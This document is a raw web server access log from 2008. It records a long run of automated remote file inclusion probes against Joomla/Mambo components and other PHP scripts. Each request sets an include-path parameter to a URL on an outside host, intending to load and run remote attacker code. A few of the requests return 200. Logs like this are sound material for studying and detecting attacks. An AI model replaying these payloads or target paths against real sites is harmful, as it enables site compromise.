81.9.63.18 - - [24/Aug/2008:09:50:12 -0700] "GET /logs/access_080510.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
71.95.2.112 - - [24/Aug/2008:09:50:12 -0700] "GET /bikes/dteel/2008_08_17/IMG_4447plack.JPG HTTP/1.1" 200 228191 "http://www.st-owners.com/forums/showthread.php?t=42795&page=8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:50:13 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 200 9933 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:50:14 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:50:47 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:50:47 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:50:47 -0700] "GET //index.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt???? HTTP/1.1" 200 9875 "-" "libwww-perl/5.810" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:51:03 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:51:04 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.187.94.181 - - [24/Aug/2008:09:51:10 -0700] "GET /logs/access_080723.log//index.php?INCLUDE_FOLDER=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.187.94.181 - - [24/Aug/2008:09:51:11 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.187.94.181 - - [24/Aug/2008:09:51:12 -0700] "GET //index.php?INCLUDE_FOLDER=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 200 9886 "-" "libwww-perl/5.79" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:51:13 -0700] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.187.94.181 - - [24/Aug/2008:09:51:19 -0700] "GET /logs/access_080722.log//index.php?INCLUDE_FOLDER=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.75.56.186 - - [24/Aug/2008:09:51:32 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:51:32 -0700] "GET /logs/access_080731.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.53.133.106 - - [24/Aug/2008:09:51:47 -0700] "GET /logs/access_080402.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.53.133.106 - - [24/Aug/2008:09:51:48 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.53.133.106 - - [24/Aug/2008:09:51:49 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:52:05 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:52:08 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.26.124 - - [24/Aug/2008:09:52:25 -0700] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.53.133.106 - - [24/Aug/2008:09:52:26 -0700] "GET /logs/access_080525.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.26.124 - - [24/Aug/2008:09:52:26 -0700] "GET //errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.16.26.124 - - [24/Aug/2008:09:52:32 -0700] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.16.26.124 - - [24/Aug/2008:09:52:32 -0700] "GET //errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:52:33 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:52:34 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:52:36 -0700] "GET /logs/access_080417.log//include.php?path[docroot]=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:52:36 -0700] "GET //include.php?path[docroot]=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:52:36 -0700] "GET /logs//include.php?path[docroot]=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:52:40 -0700] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:52:41 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:52:41 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:52:45 -0700] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:52:46 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:52:46 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:52:50 -0700] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:52:59 -0700] "GET /logs/access_080610.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:52:59 -0700] "GET /logs/access_080530.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:53:02 -0700] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:53:03 -0700] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:53:04 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.210.195 - - [24/Aug/2008:09:53:04 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.210.195 - - [24/Aug/2008:09:53:04 -0700] "GET //index.php?INCLUDE_FOLDER=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 200 9886 "-" "libwww-perl/5.79" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:53:05 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:09:53:21 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.210.195 - - [24/Aug/2008:09:53:21 -0700] "GET /logs/access_080722.log//index.php?INCLUDE_FOLDER=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:09:53:21 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.26.124 - - [24/Aug/2008:09:53:25 -0700] "GET //errors.php?error=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:53:26 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:53:34 -0700] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.56.186 - - [24/Aug/2008:09:53:41 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:53:41 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:53:41 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:53:42 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:53:42 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:53:50 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://spiritualcultivation.com/modules/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:53:50 -0700] "GET /logs/access_080811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:53:51 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://spiritualcultivation.com/modules/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:53:51 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://spiritualcultivation.com/modules/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:53:52 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 10056 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:53:52 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:53:53 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://spiritualcultivation.com/modules/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:53:56 -0700] "GET /logs/access.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:09:53:57 -0700] "GET /logs/access_080708.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:09:53:57 -0700] "GET /logs/access_080711.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:53:59 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:53:59 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.75.155.204 - - [24/Aug/2008:09:54:00 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.155.204 - - [24/Aug/2008:09:54:00 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:54:02 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:54:02 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:54:02 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:54:03 -0700] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:54:03 -0700] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:54:04 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:54:04 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:54:04 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:54:04 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:54:04 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.203.223.25 - - [24/Aug/2008:09:54:15 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [24/Aug/2008:09:54:15 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:09:54:23 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.155.204 - - [24/Aug/2008:09:54:31 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.155.204 - - [24/Aug/2008:09:54:32 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.155.204 - - [24/Aug/2008:09:54:32 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.249.151 - - [24/Aug/2008:09:54:35 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/coi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
209.216.249.151 - - [24/Aug/2008:09:54:35 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:54:35 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.151 - - [24/Aug/2008:09:54:35 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/coi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:54:35 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.151 - - [24/Aug/2008:09:54:35 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:54:36 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:54:37 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.200.212.3 - - [24/Aug/2008:09:54:43 -0700] "GET /logs/access_080401.log//index.php?cmd=search&words=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.88.11 - - [24/Aug/2008:09:54:45 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/coi.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.214.88.11 - - [24/Aug/2008:09:54:46 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/coi.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
